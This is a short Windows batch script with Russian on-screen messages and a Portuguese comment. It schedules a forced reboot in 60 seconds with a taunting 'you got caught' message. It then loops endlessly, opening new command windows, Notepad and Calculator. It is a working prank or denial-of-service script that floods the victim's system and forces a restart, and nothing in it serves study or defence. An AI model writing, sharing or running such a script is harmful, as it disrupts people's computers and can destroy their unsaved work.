@echo off
color A

start "" cmd /c "color A & echo Привет! Твой компьютер будет перезагружен через 60 секунд! & shutdown -r -c ""Привет, друг. Ты попался."" -t 60"

:loop
:: CMD aberto com mensagem em russo
start "" cmd /k "color A & echo Я здесьздесьздесьздесь!Привет! Твой компьютер будет перезагружен через 60 секунд!Привет! Твой компьютер будет перезагружен через 60 секунд!Привет! Твой компьютер будет перезагружен через 60 секундПривет, друг. Ты попалсяПривет, друг. Ты попалсяПривет, друг. Ты попалсяПривет, другТы попалсяПривет, друг. Ты попался!Привет, друг. Ты попалсяПривет, друг. Ты попалсяПривет, друг. Ты попался"
start "" notepad
start "" calc
goto loop
